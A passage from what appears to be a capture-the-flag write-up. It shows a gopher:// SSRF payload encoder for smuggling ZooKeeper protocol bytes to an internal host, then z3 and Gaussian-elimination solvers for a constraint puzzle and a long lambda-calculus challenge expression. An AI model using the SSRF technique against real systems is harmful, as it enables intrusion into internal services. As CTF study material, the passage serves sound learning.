*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Connection: close
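The `%25xx` runs in the URL above are the raw zookeeper protocol bytes percent-encoded twice: once so that `gopher://` delivers them verbatim, and once more so they survive the outer `url=` query parameter. A minimal encoder sketch (the helper name `gopher_payload` is ours):

```python
from urllib.parse import quote

def gopher_payload(host: str, port: int, raw: bytes) -> str:
    # gopher:// discards the single character after the '/', hence the '_';
    # encode each raw byte once for gopher, then once more so the payload
    # survives being passed through the SSRF endpoint's url= parameter
    once = ''.join('%{:02x}'.format(b) for b in raw)
    return 'gopher://{}:{}/_{}'.format(host, port, quote(once, safe=''))

print(gopher_payload('10.0.20.11', 2181, b'\x00\x00\x00\x2d'))
# → gopher://10.0.20.11:2181/_%2500%2500%2500%252d
```

The first four bytes `\x00\x00\x00\x2d` reproduce the `%2500%2500%2500%252d` prefix of the request above (a zookeeper length header).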
from z3 import *
a0 = Int('a0')
a1 = Int('a1')
a2 = Int('a2')
a3 = Int('a3')
a4 = Int('a4')
a5 = Int('a5')
a6 = Int('a6')
a7 = Int('a7')
a8 = Int('a8')
a9 = Int('a9')
a10 = Int('a10')
a11 = Int('a11')
a12 = Int('a12')
a13 = Int('a13')
a14 = Int('a14')
a15 = Int('a15')
a16 = Int('a16')
a17 = Int('a17')
a18 = Int('a18')
a19 = Int('a19')
# (note on the lambda-calculus challenge: an expression node has three
# types -- type 0 is a variable x, type 1 is an abstraction lambda x. N(x),
# and type 2 is an application M N, i.e. M applied to N)
so = Solver()
so.add( (((((((0+(2*((a10+0))+0)+0))+(10*((a8+0))+0)+0))+(3*((a11+0))+0)+0))+0)-1753==0)
so.add( (((((((0+(7*((a17+0))+0)+0))+(6*((a4+0))+0)+0))+(8*((a16+0))+0)+0))+0)-2117==0)
so.add( (((((((0+(4*((a5+0))+0)+0))+(3*((a15+0))+0)+0))+(6*((a6+0))+0)+0))+0)-1071==0)
so.add( (((((((0+(3*((a17+0))+0)+0))+(5*((a4+0))+0)+0))+(2*((a16+0))+0)+0))+0)-1116==0)
so.add( (((((((0+(10*((a14+0))+0)+0))+(4*((a0+0))+0)+0))+(10*((a9+0))+0)+0))+0)-2190==0)
so.add( (((((((0+(9*((a14+0))+0)+0))+(4*((a0+0))+0)+0))+(4*((a9+0))+0)+0))+0)-1764==0)
so.add( (((((((0+(2*((a3+0))+0)+0))+(1*((a2+0))+0)+0))+(3*((a1+0))+0)+0))+0)-617==0)
so.add( (((((((0+(9*((a14+0))+0)+0))+(8*((a0+0))+0)+0))+(3*((a9+0))+0)+0))+0)-2193==0)
so.add( (((((((0+(1*((a17+0))+0)+0))+(5*((a4+0))+0)+0))+(2*((a16+0))+0)+0))+0)-866==0)
so.add( (((((((0+(8*((a5+0))+0)+0))+(2*((a15+0))+0)+0))+(8*((a6+0))+0)+0))+0)-1594==0)
so.add( (((((((0+(5*((a12+0))+0)+0))+(10*((a13+0))+0)+0))+(2*((a7+0))+0)+0))+0)-1153==0)
so.add( (((((((0+(10*((a12+0))+0)+0))+(5*((a13+0))+0)+0))+(8*((a7+0))+0)+0))+0)-1737==0)
so.add( (((((((0+(5*((a12+0))+0)+0))+(9*((a13+0))+0)+0))+(9*((a7+0))+0)+0))+0)-1445==0)
so.add( (((((((0+(4*((a10+0))+0)+0))+(7*((a8+0))+0)+0))+(7*((a11+0))+0)+0))+0)-2119==0)
so.add( (((((((0+(5*((a3+0))+0)+0))+(2*((a2+0))+0)+0))+(5*((a1+0))+0)+0))+0)-1237==0)
so.add( (((((((0+(9*((a5+0))+0)+0))+(8*((a15+0))+0)+0))+(4*((a6+0))+0)+0))+0)-1463==0)
so.add( (((((((0+(7*((a10+0))+0)+0))+(8*((a8+0))+0)+0))+(4*((a11+0))+0)+0))+0)-2217==0)
so.add( (((((((0+(6*((a3+0))+0)+0))+(10*((a2+0))+0)+0))+(1*((a1+0))+0)+0))+0)-1871==0)
print(so.check())
print(so.model())
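The 18 constraints split into six independent 3x3 linear systems, so they can also be cross-checked without z3 by exact Gaussian elimination over the rationals. A sketch for the (a3, a2, a1) subsystem taken from three of the `so.add` lines above:

```python
from fractions import Fraction

def solve3(A, b):
    # Gauss-Jordan elimination on a 3x3 system, kept exact with Fractions
    M = [[Fraction(x) for x in row] + [Fraction(y)] for row, y in zip(A, b)]
    n = 3
    for i in range(n):
        p = next(r for r in range(i, n) if M[r][i] != 0)  # partial pivot
        M[i], M[p] = M[p], M[i]
        M[i] = [x / M[i][i] for x in M[i]]                # normalize pivot row
        for r in range(n):
            if r != i:
                M[r] = [xr - M[r][i] * xi for xr, xi in zip(M[r], M[i])]
    return [M[r][n] for r in range(n)]

# coefficients of a3, a2, a1 from the constraints ...-617, ...-1237, ...-1871
sol = solve3([[2, 1, 3], [5, 2, 5], [6, 10, 1]], [617, 1237, 1871])
print([int(v) for v in sol], ''.join(chr(int(v)) for v in sol))
# → [102, 116, 99] ftc   (i.e. a3='f', a2='t', a1='c')
```

The remaining five subsystems can be checked the same way; z3 of course solves all of them at once.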
((lambda s_91 lambda s_70 ((91)(70))(91))(((lambda s_184 lambda s_158 ((184)(158))
(184))(((lambda s_255 lambda s_207 ((255)(207))(255))(((lambda s_152 lambda s_184
((152)(184))(152))(((lambda s_189 lambda s_108 ((189)(108))(189))(((lambda s_133 lambda
s_107 ((133)(107))(133))(((lambda s_213 lambda s_222 ((213)(222))(213))(((lambda s_133
lambda s_44 ((133)(44))(133))(((lambda s_120 lambda s_237 ((120)(237))(120))(((lambda
s_206 lambda s_78 ((206)(78))(206))(((lambda s_118 lambda s_13 ((118)(13))(118))
(((lambda s_92 lambda s_183 ((92)(183))(92))(((lambda s_228 lambda s_101 ((228)(101))
(228))(((lambda s_241 lambda s_26 ((241)(26))(241))(((lambda s_107 lambda s_252 ((107)
(252))(107))(((lambda s_234 lambda s_47 ((234)(47))(234))(((lambda s_116 lambda s_150
((116)(150))(116))(((lambda s_144 lambda s_145 ((144)(145))(144))(((lambda s_124 lambda
s_109 ((124)(109))(124))(((lambda s_72 lambda s_85 ((72)(85))(72))(((lambda s_119
lambda s_8 ((119)(8))(119))(((lambda s_55 lambda s_69 ((55)(69))(55))(((lambda s_249
lambda s_195 ((249)(195))(249))(((lambda s_2 lambda s_33 ((2)(33))(2))(((lambda s_58
lambda s_245 ((58)(245))(58))(((lambda s_6 lambda s_62 ((6)(62))(6))(((lambda s_212
lambda s_41 ((212)(41))(212))(((lambda s_150 lambda s_119 ((150)(119))(150))(((lambda
s_25 lambda s_244 ((25)(244))(25))(((lambda s_234 lambda s_38 ((234)(38))(234))
(((lambda s_202 lambda s_127 ((202)(127))(202))(((lambda s_79 lambda s_62 ((79)(62))
(79))(((lambda s_191 lambda s_218 ((191)(218))(191))(((lambda s_218 lambda s_109 ((218)
(109))(218))(((lambda s_112 lambda s_150 ((112)(150))(112))(((lambda s_237 lambda s_13
((237)(13))(237))(((lambda s_62 lambda s_98 ((62)(98))(62))(((lambda s_65 lambda s_158
((65)(158))(65))(((lambda s_113 lambda s_56 ((113)(56))(113))(((lambda s_203 lambda
s_23 ((203)(23))(203))(((lambda s_24 lambda s_59 ((24)(59))(24))(((lambda s_4 lambda
s_251 ((4)(251))(4))(((lambda s_184 lambda s_26 ((184)(26))(184))(((lambda s_231 lambda
s_82 ((231)(82))(231))(((lambda s_206 lambda s_43 ((206)(43))(206))(((lambda s_149
lambda s_195 ((149)(195))(149))(((lambda s_149 lambda s_169 ((149)(169))(149))(((lambda
s_161 lambda s_23 ((161)(23))(161))(((lambda s_67 lambda s_210 ((67)(210))(67))
(((lambda s_212 lambda s_168 ((212)(168))(212))(((lambda s_176 lambda s_4 ((176)(4))
(176))(((lambda s_218 lambda s_37 ((218)(37))(218))(((lambda s_76 lambda s_240 ((76)
(240))(76))(((lambda s_253 lambda s_102 ((253)(102))(253))(((lambda s_40 lambda s_152
((40)(152))(40))(((lambda s_128 lambda s_0 ((128)(0))(128))(((lambda s_219 lambda s_116
((219)(116))(219))(((lambda s_41 lambda s_61 ((41)(61))(41))(((lambda s_187 lambda
s_203 ((187)(203))(187))(((lambda s_16 lambda s_132 ((16)(132))(16))(((lambda s_33
lambda s_150 ((33)(150))(33))(((lambda s_86 lambda s_213 ((86)(213))(86))(((lambda
s_153 lambda s_71 ((153)(71))(153))(((lambda s_240 lambda s_19 ((240)(19))(240))
(((lambda s_197 lambda s_206 ((197)(206))(197))(((lambda s_186 lambda s_32 ((186)(32))
(186))(((lambda s_29 lambda s_130 ((29)(130))(29))(((lambda s_218 lambda s_111 ((218)
(111))(218))(((lambda s_150 lambda s_4 ((150)(4))(150))(((lambda s_169 lambda s_233
((169)(233))(169))(((lambda s_206 lambda s_135 ((206)(135))(206))(((lambda s_110 lambda
s_170 ((110)(170))(110))(((lambda s_105 lambda s_247 ((105)(247))(105))(((lambda s_98
lambda s_60 ((98)(60))(98))(((lambda s_249 lambda s_32 ((249)(32))(249))(((lambda s_143
lambda s_161 ((143)(161))(143))(((lambda s_9 lambda s_6 ((9)(6))(9))(((lambda s_4
lambda s_158 ((4)(158))(4))(((lambda s_219 lambda s_251 ((219)(251))(219))(((lambda
s_214 lambda s_59 ((214)(59))(214))(((lambda s_240 lambda s_32 ((240)(32))(240))
(((lambda s_248 lambda s_243 ((248)(243))(248))(((lambda s_39 lambda s_164 ((39)(164))
(39))(((lambda s_13 lambda s_196 ((13)(196))(13))(((lambda s_150 lambda s_151 ((150)
(151))(150))(((lambda s_26 lambda s_185 ((26)(185))(26))(((lambda s_234 lambda s_183
((234)(183))(234))(((lambda s_190 lambda s_127 ((190)(127))(190))(((lambda s_144 lambda
s_120 ((144)(120))(144))(((lambda s_187 lambda s_30 ((187)(30))(187))(((lambda s_121
lambda s_107 ((121)(107))(121))(((lambda s_103 lambda s_223 ((103)(223))(103))(((lambda
s_135 lambda s_80 ((135)(80))(135))(((lambda s_168 lambda s_227 ((168)(227))(168))
(((lambda s_94 lambda s_168 ((94)(168))(94))(((lambda s_243 lambda s_122 ((243)(122))
(243))(((lambda s_61 lambda s_43 ((61)(43))(61))(((lambda s_244 lambda s_69 ((244)(69))
(244))(((lambda s_244 lambda s_172 ((244)(172))(244))(((lambda s_22 lambda s_141 ((22)
(141))(22))(((lambda s_177 lambda s_194 ((177)(194))(177))(((lambda s_96 lambda s_136
((96)(136))(96))(((lambda s_128 lambda s_249 ((128)(249))(128))(((lambda s_222 lambda
s_20 ((222)(20))(222))(((lambda s_101 lambda s_93 ((101)(93))(101))(((lambda s_50
lambda s_254 ((50)(254))(50))(((lambda s_183 lambda s_210 ((183)(210))(183))(((lambda
s_124 lambda s_23 ((124)(23))(124))(((lambda s_161 lambda s_208 ((161)(208))(161))
(((lambda s_129 lambda s_246 ((129)(246))(129))(((lambda s_140 lambda s_109 ((140)
(109))(140))(((lambda s_119 lambda s_141 ((119)(141))(119))(((lambda s_250 lambda s_117
((250)(117))(250))(((lambda s_186 lambda s_183 ((186)(183))(186))(((lambda s_174 lambda
s_195 ((174)(195))(174))(((lambda s_107 lambda s_97 ((107)(97))(107))(((lambda s_130
lambda s_21 ((130)(21))(130))(((lambda s_163 lambda s_204 ((163)(204))(163))(((lambda
s_62 lambda s_6 ((62)(6))(62))(((lambda s_126 lambda s_153 ((126)(153))(126))(((lambda
s_88 lambda s_75 ((88)(75))(88))(((lambda s_129 lambda s_31 ((129)(31))(129))(((lambda
s_192 lambda s_88 ((192)(88))(192))(((lambda s_147 lambda s_11 ((147)(11))(147))
(((lambda s_189 lambda s_117 ((189)(117))(189))(((lambda s_134 lambda s_179 ((134)
(179))(134))(((lambda s_70 lambda s_87 ((70)(87))(70))(((lambda s_67 lambda s_144 ((67)
(144))(67))(((lambda s_111 lambda s_82 ((111)(82))(111))(((lambda s_4 lambda s_74 ((4)
(74))(4))(((lambda s_156 lambda s_239 ((156)(239))(156))(((lambda s_235 lambda s_39
((235)(39))(235))(((lambda s_90 lambda s_175 ((90)(175))(90))(((lambda s_157 lambda
s_164 ((157)(164))(157))(((lambda s_159 lambda s_180 ((159)(180))(159))(((lambda s_28
lambda s_209 ((28)(209))(28))(((lambda s_69 lambda s_108 ((69)(108))(69))(((lambda
s_121 lambda s_37 ((121)(37))(121))(((lambda s_119 lambda s_95 ((119)(95))(119))
(((lambda s_218 lambda s_99 ((218)(99))(218))(((lambda s_43 lambda s_188 ((43)(188))
(43))(((lambda s_87 lambda s_128 ((87)(128))(87))(((lambda s_150 lambda s_10 ((150)
(10))(150))(((lambda s_64 lambda s_22 ((64)(22))(64))(((lambda s_199 lambda s_170
((199)(170))(199))(((lambda s_70 lambda s_131 ((70)(131))(70))(((lambda s_41 lambda
s_175 ((41)(175))(41))(((lambda s_226 lambda s_94 ((226)(94))(226))(((lambda s_109
lambda s_247 ((109)(247))(109))(((lambda s_58 lambda s_227 ((58)(227))(58))(((lambda
s_130 lambda s_249 ((130)(249))(130))(((lambda s_31 lambda s_89 ((31)(89))(31))
(((lambda s_153 lambda s_148 ((153)(148))(153))(((lambda s_176 lambda s_199 ((176)
(199))(176))(((lambda s_16 lambda s_200 ((16)(200))(16))(((lambda s_197 lambda s_203
((197)(203))(197))(((lambda s_210 lambda s_220 ((210)(220))(210))(((lambda s_123 lambda
s_219 ((123)(219))(123))(((lambda s_185 lambda s_142 ((185)(142))(185))(((lambda s_121
lambda s_29 ((121)(29))(121))(((lambda s_202 lambda s_187 ((202)(187))(202))(((lambda
s_159 lambda s_218 ((159)(218))(159))(((lambda s_190 lambda s_24 ((190)(24))(190))
(((lambda s_108 lambda s_231 ((108)(231))(108))(((lambda s_86 lambda s_157 ((86)(157))
(86))(((lambda s_243 lambda s_56 ((243)(56))(243))(((lambda s_7 lambda s_155 ((7)(155))
(7))(((lambda s_240 lambda s_124 ((240)(124))(240))(((lambda s_212 lambda s_143 ((212)
(143))(212))(((lambda s_199 lambda s_161 ((199)(161))(199))(((lambda s_149 lambda s_176
((149)(176))(149))(((lambda s_233 lambda s_49 ((233)(49))(233))(((lambda s_29 lambda
s_22 ((29)(22))(29))(((lambda s_28 lambda s_89 ((28)(89))(28))(((lambda s_16 lambda
s_80 ((16)(80))(16))(((lambda s_254 lambda s_220 ((254)(220))(254))(((lambda s_227
lambda s_83 ((227)(83))(227))(((lambda s_248 lambda s_212 ((248)(212))(248))(((lambda
s_25 lambda s_164 ((25)(164))(25))(((lambda s_12 lambda s_21 ((12)(21))(12))(((lambda
s_24 lambda s_6 ((24)(6))(24))(((lambda s_151 lambda s_250 ((151)(250))(151))(((lambda
s_74 lambda s_102 ((74)(102))(74))(((lambda s_132 lambda s_119 ((132)(119))(132))
(((lambda s_249 lambda s_233 ((249)(233))(249))(((lambda s_242 lambda s_139 ((242)
(139))(242))(((lambda s_75 lambda s_185 ((75)(185))(75))(((lambda s_142 lambda s_249
((142)(249))(142))(((lambda s_154 lambda s_251 ((154)(251))(154))(((lambda s_125 lambda
s_67 ((125)(67))(125))(((lambda s_43 lambda s_196 ((43)(196))(43))(((lambda s_187
lambda s_22 ((187)(22))(187))(((lambda s_210 lambda s_233 ((210)(233))(210))(((lambda
s_27 lambda s_127 ((27)(127))(27))(((lambda s_239 lambda s_7 ((239)(7))(239))(((lambda
s_85 lambda s_193 ((85)(193))(85))(((lambda s_120 lambda s_124 ((120)(124))(120))
(((lambda s_225 lambda s_121 ((225)(121))(225))(((lambda s_153 lambda s_4 ((153)(4))
(153))(((lambda s_76 lambda s_11 ((76)(11))(76))(((lambda s_34 lambda s_189 ((34)(189))
(34))(((lambda s_221 lambda s_81 ((221)(81))(221))(((lambda s_90 lambda s_42 ((90)(42))
(90))(((lambda s_30 lambda s_94 ((30)(94))(30))(((lambda s_125 lambda s_156 ((125)
(156))(125))(((lambda s_148 lambda s_235 ((148)(235))(148))(((lambda s_104 lambda s_176
((104)(176))(104))(((lambda s_229 lambda s_46 ((229)(46))(229))(((lambda s_182 lambda
s_118 ((182)(118))(182))(((lambda s_138 lambda s_104 ((138)(104))(138))(((lambda s_83
lambda s_38 ((83)(38))(83))(((lambda s_183 lambda s_71 ((183)(71))(183))(((lambda s_113
lambda s_32 ((113)(32))(113))(((lambda s_186 lambda s_194 ((186)(194))(186))(((lambda
s_240 lambda s_144 ((240)(144))(240))(((lambda s_224 lambda s_231 ((224)(231))(224))
(((lambda s_46 lambda s_155 ((46)(155))(46))(((lambda s_73 lambda s_150 ((73)(150))
(73))(((lambda s_125 lambda s_86 ((125)(86))(125))(((lambda s_242 lambda s_118 ((242)
(118))(242))(((lambda s_89 lambda s_135 ((89)(135))(89))(((lambda s_253 lambda s_59
((253)(59))(253))(((lambda s_13 lambda s_153 ((13)(153))(13))(((lambda s_148 lambda
s_60 ((148)(60))(148))(((lambda s_76 lambda s_69 ((76)(69))(76))(((lambda s_44 lambda
s_244 ((44)(244))(44))(((lambda s_222 lambda s_172 ((222)(172))(222))(((lambda s_239
lambda s_7 ((239)(7))(239))(((lambda s_167 lambda s_154 ((167)(154))(167))(((lambda s_9
lambda s_79 ((9)(79))(9))(((lambda s_11 lambda s_149 ((11)(149))(11))(((lambda s_24
lambda s_128 ((24)(128))(24))(((lambda s_162 lambda s_21 ((162)(21))(162))(((lambda
s_228 lambda s_95 ((228)(95))(228))(((lambda s_60 lambda s_58 ((60)(58))(60))(((lambda
s_249 lambda s_122 ((249)(122))(249))(((lambda s_189 lambda s_114 ((189)(114))(189))
(((lambda s_108 lambda s_85 ((108)(85))(108))(((lambda s_65 lambda s_81 ((65)(81))(65))
(((lambda s_1 lambda s_63 ((1)(63))(1))(((lambda s_93 lambda s_70 ((93)(70))(93))
(((lambda s_181 lambda s_188 ((181)(188))(181))(((lambda s_77 lambda s_59 ((77)(59))
(77))(((lambda s_39 lambda s_95 ((39)(95))(39))(((lambda s_119 lambda s_166 ((119)
(166))(119))(((lambda s_44 lambda s_253 ((44)(253))(44))(((lambda s_188 lambda s_29
((188)(29))(188))(((lambda s_251 lambda s_144 ((251)(144))(251))(((lambda s_213 lambda
s_104 ((213)(104))(213))(((lambda s_105 lambda s_28 ((105)(28))(105))(((lambda s_226
lambda s_70 ((226)(70))(226))(((lambda s_175 lambda s_245 ((175)(245))(175))(((lambda
s_101 lambda s_41 ((101)(41))(101))(((lambda s_55 lambda s_20 ((55)(20))(55))(((lambda
s_124 lambda s_53 ((124)(53))(124))(((lambda s_103 lambda s_154 ((103)(154))(103))
(((lambda s_14 lambda s_225 ((14)(225))(14))(((lambda s_163 lambda s_4 ((163)(4))(163))
(((lambda s_142 lambda s_45 ((142)(45))(142))(((lambda s_55 lambda s_186 ((55)(186))
(55))(((lambda s_171 lambda s_186 ((171)(186))(171))(((lambda s_161 lambda s_216 ((161)
(216))(161))(((lambda s_5 lambda s_195 ((5)(195))(5))(((lambda s_11 lambda s_39 ((11)
(39))(11))(((lambda s_183 lambda s_223 ((183)(223))(183))(((lambda s_247 lambda s_21
((247)(21))(247))(((lambda s_233 lambda s_166 ((233)(166))(233))(((lambda s_231 lambda
s_129 ((231)(129))(231))(((lambda s_108 lambda s_211 ((108)(211))(108))(((lambda s_180
lambda s_106 ((180)(106))(180))(((lambda s_82 lambda s_205 ((82)(205))(82))(((lambda
s_89 lambda s_146 ((89)(146))(89))(((lambda s_152 lambda s_162 ((152)(162))(152))
(((lambda s_171 lambda s_140 ((171)(140))(171))(((lambda s_192 lambda s_244 ((192)
(244))(192))(((lambda s_79 lambda s_78 ((79)(78))(79))(((lambda s_126 lambda s_68
((126)(68))(126))(((lambda s_75 lambda s_143 ((75)(143))(75))(((lambda s_78 lambda
s_175 ((78)(175))(78))(((lambda s_168 lambda s_111 ((168)(111))(168))(((lambda s_234
lambda s_180 ((234)(180))(234))(((lambda s_135 lambda s_49 ((135)(49))(135))(((lambda
s_17 lambda s_222 ((17)(222))(17))(((lambda s_179 lambda s_136 ((179)(136))(179))
(((lambda s_138 lambda s_202 ((138)(202))(138))(((lambda s_97 lambda s_31 ((97)(31))
(97))(((lambda s_139 lambda s_130 ((139)(130))(139))(((lambda s_207 lambda s_197 ((207)
(197))(207))(((lambda s_190 lambda s_151 ((190)(151))(190))(((lambda s_228 lambda s_16
((228)(16))(228))(((lambda s_171 lambda s_233 ((171)(233))(171))(((lambda s_148 lambda
s_161 ((148)(161))(148))(((lambda s_140 lambda s_53 ((140)(53))(140))(((lambda s_121
lambda s_183 ((121)(183))(121))(((lambda s_74 lambda s_248 ((74)(248))(74))(((lambda
s_126 lambda s_165 ((126)(165))(126))(((lambda s_32 lambda s_178 ((32)(178))(32))
(((lambda s_28 lambda s_97 ((28)(97))(28))(((lambda s_235 lambda s_39 ((235)(39))(235))
(((lambda s_210 lambda s_243 ((210)(243))(210))(((lambda s_97 lambda s_23 ((97)(23))
(97))(((lambda s_60 lambda s_137 ((60)(137))(60))(((lambda s_60 lambda s_141 ((60)
(141))(60))(((lambda s_172 lambda s_113 ((172)(113))(172))(((lambda s_217 lambda s_195
((217)(195))(217))(((lambda s_93 lambda s_174 ((93)(174))(93))(((lambda s_215 lambda
s_119 ((215)(119))(215))(((lambda s_168 lambda s_169 ((168)(169))(168))(((lambda s_90
lambda s_141 ((90)(141))(90))(((lambda s_182 lambda s_169 ((182)(169))(182))(((lambda
s_32 lambda s_70 ((32)(70))(32))(((lambda s_44 lambda s_21 ((44)(21))(44))(((lambda
s_36 lambda s_121 ((36)(121))(36))(((lambda s_2 lambda s_123 ((2)(123))(2))(((lambda
s_201 lambda s_183 ((201)(183))(201))(((lambda s_253 lambda s_70 ((253)(70))(253))
(((lambda s_144 lambda s_6 ((144)(6))(144))(((lambda s_143 lambda s_63 ((143)(63))
(143))(((lambda s_187 lambda s_221 ((187)(221))(187))(((lambda s_128 lambda s_17 ((128)
(17))(128))(((lambda s_243 lambda s_37 ((243)(37))(243))(((lambda s_173 lambda s_214
((173)(214))(173))(((lambda s_111 lambda s_253 ((111)(253))(111))(((lambda s_110 lambda
s_177 ((110)(177))(110))(((lambda s_52 lambda s_216 ((52)(216))(52))(((lambda s_129
lambda s_113 ((129)(113))(129))(((lambda s_218 lambda s_151 ((218)(151))(218))(((lambda
s_47 lambda s_107 ((47)(107))(47))(((lambda s_221 lambda s_203 ((221)(203))(221))
(((lambda s_145 lambda s_61 ((145)(61))(145))(((lambda s_29 lambda s_34 ((29)(34))(29))
(((lambda s_152 lambda s_3 ((152)(3))(152))(((lambda s_246 lambda s_15 ((246)(15))
(246))(((lambda s_157 lambda s_141 ((157)(141))(157))(((lambda s_131 lambda s_249
((131)(249))(131))(((lambda s_59 lambda s_151 ((59)(151))(59))(((lambda s_162 lambda
s_226 ((162)(226))(162))(((lambda s_4 lambda s_249 ((4)(249))(4))(((lambda s_202 lambda
s_180 ((202)(180))(202))(((lambda s_79 lambda s_224 ((79)(224))(79))(((lambda s_49
lambda s_135 ((49)(135))(49))(((lambda s_46 lambda s_189 ((46)(189))(46))(((lambda
s_177 lambda s_132 ((177)(132))(177))(((lambda s_250 lambda s_5 ((250)(5))(250))
(((lambda s_115 lambda s_217 ((115)(217))(115))(((lambda s_96 lambda s_210 ((96)(210))
(96))(((lambda s_20 lambda s_52 ((20)(52))(20))(((lambda s_78 lambda s_57 ((78)(57))
(78))(((lambda s_1 lambda s_236 ((1)(236))(1))(((lambda s_50 lambda s_140 ((50)(140))
(50))(((lambda s_122 lambda s_94 ((122)(94))(122))(((lambda s_19 lambda s_219 ((19)
(219))(19))(((lambda s_119 lambda s_141 ((119)(141))(119))(((lambda s_83 lambda s_114
((83)(114))(83))(((lambda s_97 lambda s_27 ((97)(27))(97))(((lambda s_134 lambda s_45
((134)(45))(134))(((lambda s_212 lambda s_103 ((212)(103))(212))(((lambda s_91 lambda
s_12 ((91)(12))(91))(((lambda s_155 lambda s_43 ((155)(43))(155))(((lambda s_253 lambda
s_243 ((253)(243))(253))(((lambda s_27 lambda s_47 ((27)(47))(27))(((lambda s_224
lambda s_104 ((224)(104))(224))(((lambda s_67 lambda s_174 ((67)(174))(67))(((lambda
s_119 lambda s_220 ((119)(220))(119))(((lambda s_165 lambda s_5 ((165)(5))(165))
(((lambda s_12 lambda s_77 ((12)(77))(12))(((lambda s_156 lambda s_170 ((156)(170))
(156))(((lambda s_198 lambda s_229 ((198)(229))(198))(((lambda s_15 lambda s_56 ((15)
(56))(15))(((lambda s_104 lambda s_79 ((104)(79))(104))(((lambda s_86 lambda s_98 ((86)
(98))(86))(((lambda s_60 lambda s_66 ((60)(66))(60))(((lambda s_123 lambda s_252 ((123)
(252))(123))(((lambda s_140 lambda s_118 ((140)(118))(140))(((lambda s_124 lambda s_44
((124)(44))(124))(((lambda s_79 lambda s_147 ((79)(147))(79))(((lambda s_229 lambda
s_91 ((229)(91))(229))(((lambda s_119 lambda s_252 ((119)(252))(119))(((lambda s_84
lambda s_83 ((84)(83))(84))(((lambda s_153 lambda s_14 ((153)(14))(153))(((lambda s_212
lambda s_82 ((212)(82))(212))(((lambda s_112 lambda s_22 ((112)(22))(112))(((lambda
s_186 lambda s_63 ((186)(63))(186))(((lambda s_106 lambda s_31 ((106)(31))(106))(lambda
s_39 lambda s_65 39))(((lambda s_152 lambda s_157 ((lambda s_117 lambda s_220 ((117)
(117))(220))(((lambda s_154 lambda s_224 ((154)(224))(154))(157))((lambda s_81 lambda
s_222 lambda s_66 ((81)(66))(222))(152))))(((lambda s_158 lambda s_201 ((158)(201))
(158))((lambda s_171 lambda s_163 lambda s_113 ((171)(113))(163))(157)))(152)))(lambda
s_1 lambda s_0 0))(lambda s_115 lambda s_245 115))))(((lambda s_106 lambda s_153
((lambda s_162 lambda s_187 ((162)(162))(187))(((lambda s_28 lambda s_184 ((28)(184))
(28))(153))((lambda s_158 lambda s_222 lambda s_29 ((158)(29))(222))(106))))(((lambda
s_248 lambda s_217 ((248)(217))(248))((lambda s_234 lambda s_6 lambda s_82 ((234)(82))
(6))(153)))(106)))(lambda s_1 lambda s_0 0))(lambda s_16 lambda s_113 16))))(((lambda
s_104 lambda s_111 ((lambda s_8 lambda s_189 ((8)(8))(189))(((lambda s_220 lambda s_250
((220)(250))(220))(111))((lambda s_111 lambda s_251 lambda s_146 ((111)(146))(251))
(104))))(((lambda s_19 lambda s_228 ((19)(228))(19))((lambda s_251 lambda s_146 lambda
s_226 ((251)(226))(146))(111)))(104)))(lambda s_0 lambda s_1 0))(lambda s_164 lambda
s_35 35))))(((lambda s_231 lambda s_121 ((lambda s_50 lambda s_79 ((50)(50))(79))
(((lambda s_218 lambda s_74 ((218)(74))(218))(121))((lambda s_201 lambda s_214 lambda
s_107 ((201)(107))(214))(231))))(((lambda s_49 lambda s_169 ((49)(169))(49))((lambda
s_238 lambda s_52 lambda s_40 ((238)(40))(52))(121)))(231)))(lambda s_1 lambda s_0 1))
(lambda s_168 lambda s_97 97))))(((lambda s_47 lambda s_162 ((lambda s_73 lambda s_120
((73)(73))(120))(((lambda s_118 lambda s_228 ((118)(228))(118))(162))((lambda s_223
lambda s_115 lambda s_157 ((223)(157))(115))(47))))(((lambda s_130 lambda s_185 ((130)
(185))(130))((lambda s_133 lambda s_29 lambda s_211 ((133)(211))(29))(162)))(47)))
(lambda s_0 lambda s_1 1))(lambda s_45 lambda s_38 45))))(((lambda s_228 lambda s_90
((lambda s_5 lambda s_51 ((5)(5))(51))(((lambda s_71 lambda s_209 ((71)(209))(71))(90))
((lambda s_215 lambda s_91 lambda s_255 ((215)(255))(91))(228))))(((lambda s_118 lambda
s_44 ((118)(44))(118))((lambda s_189 lambda s_28 lambda s_76 ((189)(76))(28))(90)))
(228)))(lambda s_0 lambda s_1 0))(lambda s_28 lambda s_147 147))))(((lambda s_252
lambda s_1 ((lambda s_156 lambda s_164 ((156)(156))(164))(((lambda s_178 lambda s_183
((178)(183))(178))(1))((lambda s_51 lambda s_27 lambda s_72 ((51)(72))(27))(252))))
(((lambda s_247 lambda s_99 ((247)(99))(247))((lambda s_137 lambda s_165 lambda s_132
((137)(132))(165))(1)))(252)))(lambda s_0 lambda s_1 1))(lambda s_75 lambda s_5 75))))
(((lambda s_155 lambda s_1 ((lambda s_165 lambda s_153 ((165)(165))(153))(((lambda
s_140 lambda s_207 ((140)(207))(140))(1))((lambda s_9 lambda s_189 lambda s_65 ((9)
(65))(189))(155))))(((lambda s_65 lambda s_173 ((65)(173))(65))((lambda s_170 lambda
s_81 lambda s_148 ((170)(148))(81))(1)))(155)))(lambda s_1 lambda s_0 0))(lambda s_210
lambda s_60 210))))(((lambda s_123 lambda s_189 ((lambda s_154 lambda s_10 ((154)(154))
(10))(((lambda s_63 lambda s_18 ((63)(18))(63))(189))((lambda s_69 lambda s_221 lambda
s_167 ((69)(167))(221))(123))))(((lambda s_22 lambda s_119 ((22)(119))(22))((lambda
s_242 lambda s_26 lambda s_41 ((242)(41))(26))(189)))(123)))(lambda s_1 lambda s_0 1))
(lambda s_204 lambda s_152 152))))(((lambda s_134 lambda s_33 ((lambda s_63 lambda s_94
((63)(63))(94))(((lambda s_26 lambda s_43 ((26)(43))(26))(33))((lambda s_80 lambda s_57
lambda s_8 ((80)(8))(57))(134))))(((lambda s_121 lambda s_114 ((121)(114))(121))
((lambda s_133 lambda s_255 lambda s_62 ((133)(62))(255))(33)))(134)))(lambda s_1
lambda s_0 1))(lambda s_105 lambda s_106 106))))(((lambda s_87 lambda s_244 ((lambda
s_255 lambda s_253 ((255)(255))(253))(((lambda s_130 lambda s_61 ((130)(61))(130))
(244))((lambda s_40 lambda s_5 lambda s_231 ((40)(231))(5))(87))))(((lambda s_58 lambda
s_26 ((58)(26))(58))((lambda s_92 lambda s_37 lambda s_20 ((92)(20))(37))(244)))(87)))
